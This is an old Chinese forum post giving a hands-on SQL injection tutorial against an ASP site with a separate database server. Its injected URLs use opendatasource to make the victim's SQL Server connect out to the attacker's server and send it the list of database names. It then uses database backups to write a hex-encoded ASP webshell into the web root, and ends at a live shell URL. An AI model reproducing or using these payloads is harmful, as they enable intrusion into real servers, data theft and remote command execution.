服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5131|回复: 0

Sql注入网站与数据库分离拿shell实例

[复制链接]
dirtysea 发表于 2008-11-5 05:03:45 | 显示全部楼层 |阅读模式

即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般

服务器装好系统什么的.都会装个IIS吧?列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也?怎么办呢?可以这样来,PING一下WEB服务器. 扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢?可以利用 opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提 得说一下.第一.你机器必须要有公网IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧! 

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入 

create database hack520 Create TABLE zhu(name nvarchar(256) null);Create TABLE J8(id int NULL,name nvarchar(256) null); 点执行.如图

建立了一个hack520的库名.和zhu J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这 条SQL语句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库 名') .库名.表名 '执行的语句' 恩现在开始吧... 

http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database= 

hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 

在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL服务器.不信?netstat -an看一下~图


已经连过来了.现在数据库服务器IP知道了.而且数据库服务器又开了80.现在干什么呢? 

bak一个webshell上去吧.已知WEB目录C:\Inetpub\wwwroot.好.开始 

http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- 备份当前库 

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])-- 建表 

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)-- 插入蓝屏木马 

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370 

backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 再次以差异备份得到WEBSHELL http://221.216xxx.xx/zhu.asp 

接下来就不说了,都知道怎么做了

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 06:59 , Processed in 0.096957 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表